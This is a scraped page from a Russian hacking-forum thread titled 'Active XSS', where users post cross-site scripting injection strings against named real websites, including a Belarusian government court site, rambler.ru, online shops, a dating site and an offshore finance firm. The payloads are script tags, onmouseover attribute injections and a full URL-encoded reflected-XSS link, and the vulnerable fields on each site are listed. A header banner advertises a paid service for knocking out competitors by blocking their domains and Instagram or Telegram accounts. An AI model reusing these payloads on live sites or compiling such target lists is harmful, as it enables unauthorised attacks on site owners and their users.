УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Активные Xss

Страница 50 из 54

« Первая

Опции темы

Поиск в этой теме

Опции просмотра

#491

28.04.2012, 16:41

Serrg

Познающий

Регистрация: 25.12.2011

Сообщений: 85

Провел на форуме:
28040

Репутация: 13

популярный сервис Спрашивай

xss в поле имя при регистрации

Код:

">alert(/xss/)
alert('xss')
">

#492

18.05.2012, 18:34

Groove

Участник форума

Регистрация: 13.11.2010

Сообщений: 184

Провел на форуме:
59158

Репутация: 2

http://212.ru/

Регистрируемся , заходим в профиль ->Настройки->

Уязвимые поля:

Имя

Пример

Цитата:

Сообщение от None

">alert('xss')

#493

27.05.2012, 01:11

Fever

Новичок

Регистрация: 04.06.2011

Сообщений: 7

Провел на форуме:
2053

Репутация: 1

интернет-магазин: gamepost.ua

тИЦ: 10

PR: 3

Ни одно поле при регистрации не фильтруется.

Уязвимо поле: Телефон

#494

10.06.2012, 17:13

Unknown

Новичок

Регистрация: 21.06.2005

Сообщений: 1

Провел на форуме:
0

Репутация: 0

интернет магазин firstspring.ru

В профиле уязвимы все поля кроме E-mail

#495

13.09.2012, 21:14

ChymeNik

Познающий

Регистрация: 31.08.2010

Сообщений: 30

Провел на форуме:
6729

Репутация: 9

XSS rambler.ru:

Логинимся на рамблере, http://foto.rambler.ru/photos/add/?album_id= загружаем фото

Редактируем описание фото (действия с фото->редактировать) на:

1'alert("Chymenik - this is XSS! +1rep")

Пример: http://foto.rambler.ru/photos/5051d95d-5cdd-e5af-2988-b7f96b35aa7c/

#496

09.01.2013, 03:10

Unknown

Новичок

Регистрация: 21.06.2005

Сообщений: 1

Провел на форуме:
0

Репутация: 0

mingorsud. gov.by

Код:

h_tp://mingorsud.gov.by/syst em/tmp ls/pages/pismo/fi z.p hp

Уязвимое поле: post_address

вставляем : " onmouseover=prompt(943147) bad="

P.S.

/system/tmpls/pages/pismo/ur.php

Уязвимое поле: post_address

#497

14.01.2013, 16:41

Unknown

Новичок

Регистрация: 21.06.2005

Сообщений: 1

Провел на форуме:
0

Репутация: 0

http://xakep.ru/articles/map/default.asp

Вставляем код в любом поле и нажимаем на Отправить и вы суперхакер.

#498

25.02.2013, 18:39

Groove

Участник форума

Регистрация: 13.11.2010

Сообщений: 184

Провел на форуме:
59158

Репутация: 2

http://russen.eu

Пример

Сама уязвиость

Уязвимое поле "О себе " Сайт находиться на 2 месте в топ mail "Знакомства"

#499

25.02.2013, 19:18

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

Провел на форуме:
69033

Репутация: 8

Цитата:

Сообщение от Groove

http
://
russen
.eu
Пример
Уязвимое поле "О себе " Сайт находиться на 2 месте в топ mail "Знакомства"

Приложите пример вставляемого скрипта пожалуйста.

#500

27.02.2013, 22:37

Unknown

Новичок

Регистрация: 21.06.2005

Сообщений: 1

Провел на форуме:
0

Репутация: 0

https://www.abacuscapital.ky

Код:

https://www.abacuscapital.ky/contact.asp?Email=CodeFail&EmailAddress=%27%20onmouseover%3dprompt%28958726%29%20bad%3d%27&MessageBody=1%3C%2ftextarea%3E1%3CScRiPt%20%3Eprompt%28978443%29%3C%2fScRiPt%3E

а точнее, уязвимы поля EmailAddress и MessageBody

Тож самое в: /process_form.asp

уязвимы поля EmailAddress и MessageBody

Страница 50 из 54

« Первая

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss для новичков	Micr0b	Уязвимости	79	06.07.2018 22:05
Xss	bx_N	Forum for discussion of ANTICHAT	7	11.03.2007 19:17
mylivepage.ru активные XSS	__XT__	Уязвимости	3	23.12.2006 14:31

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход